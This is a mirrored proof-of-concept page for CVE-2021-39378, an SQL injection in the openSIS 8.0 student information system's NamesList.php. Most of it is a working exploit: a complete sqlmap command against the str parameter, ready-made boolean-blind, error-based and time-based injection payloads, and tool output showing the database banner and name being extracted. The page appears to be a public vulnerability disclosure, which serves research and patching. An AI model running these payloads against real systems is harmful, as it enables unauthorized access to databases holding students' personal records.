CVE-2021-39378 PoC — Open Solutions For Education openSIS SQL注入漏洞

Source

https://github.com/security-n/CVE-2021-39378

Associated Vulnerability

Title:Open Solutions For Education openSIS SQL注入漏洞 (CVE-2021-39378)
Description:Open Solutions For Education openSIS是美国Open Solutions for Education（Open Solutions For Education）公司的一套开源的学生信息管理系统。 openSIS 8.0存在SQL注入漏洞，该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。

Readme

# OPENSIS 8.0 SQL INJECTION VULNERABILITY CVE-2021-39378

A SQL Injection vulnerability exists in version 8.0 of openSIS when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the vulnerable str= parameter. 

Vulnerable PHP Page:

NamesList.php

Vulnerable Payload

sqlmap -u "http://localhost:8081/NamesList.php?str=J&block_id=1" --cookie="PHPSESSID=s8n71sv8ji77mdjkmh6cj1ik5d; miniSidebar=0" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" --referer="http://localhost:8081/Modules.php?modname=miscellaneous/Portal.php&failed_login=0" --delay=0 --timeout=30 --retries=0 --dbms="MySQL" --level=3 --risk=3 --threads=8 --time-sec=5 -b --current-db --batch --answers="crack=N,dict=N,continue=Y,quit=N"

SQL Injection:

http://localhost:8081/NamesList.php             
```
Parameter: str (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: str=J%' AND 4830=4830 AND 'mmPI%'='mmPI&block_id=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: str=J%' AND (SELECT 5261 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(5261=5261,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'YfUK%'='YfUK&block_id=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: str=J%' AND (SELECT 9071 FROM (SELECT(SLEEP(5)))hYUR) AND 'vbOt%'='vbOt&block_id=1

[18:41:23] [INFO] testing MySQL
[18:41:23] [WARNING] reflective value(s) found and filtering out
[18:41:23] [INFO] confirming MySQL
[18:41:23] [INFO] the back-end DBMS is MySQL
[18:41:23] [INFO] fetching banner
[18:41:23] [INFO] resumed: '10.5.11-MariaDB-1'
web application technology: PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.5.11-MariaDB-1'
[18:41:23] [INFO] fetching current database
[18:41:23] [INFO] resumed: 'opensis5'
current database: 'opensis5'
```

Discovered by Nathan Johnson, August 2021

File Snapshot


 [4.0K]  /data/pocs/3604dd12b7066677bddb4aaffc1ec97ccd25e944
└── [2.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!